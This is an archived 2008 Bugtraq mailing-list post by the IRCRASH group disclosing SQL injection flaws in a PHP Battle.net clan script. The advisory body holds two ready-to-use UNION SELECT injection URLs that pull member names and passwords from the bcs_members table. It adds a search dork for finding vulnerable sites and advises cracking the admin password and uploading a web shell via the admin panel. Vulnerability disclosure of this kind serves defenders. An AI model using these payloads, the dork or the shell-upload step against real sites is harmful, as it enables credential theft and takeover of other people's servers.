| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-Id: <200808060421.m764LQ0g032478@www5.securityfocus.com> Date: Tue, 5 Aug 2008 22:21:26 -0600 From: r3d.w0rm@...oo.com To: bugtraq@...urityfocus.com Subject: MyClan Sql Injection ##################################################################################### #### MyClan Sql Injection ##################################################################################### # #AUTHOR : IRCRASH (R3d.W0rm (Sina Yazdanmehr)) #Discovered by : IRCRASH (R3d.W0rm (Sina Yazdanmehr)) #Our Site : Http://IRCRASH.COM #IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr) ##################################################################################### # #Script Download : www.sourceforge.net/projects/haudenschilt # #DORK : Copyright AŠ 2005-2006 Battle.net Clan Script 1.5.2 # ##################################################################################### # [Bug] # #http://Site/index.php?page=members&showmember='+union+select+name,1,2,password+from+bcs_members/* #http://Site/index.php?page=board&thread=-9999+union+select+0,1,password,name,4,5,6,7+from+bcs_members/* # # [Note] # #If you inject and crack admin password you can upload shell in medal pasge in admin panel ;) # ##################################################################################### # Site : Http://IRCRASH.COM ###################################### TNX GOD ######################################
Powered by blists - more mailing lists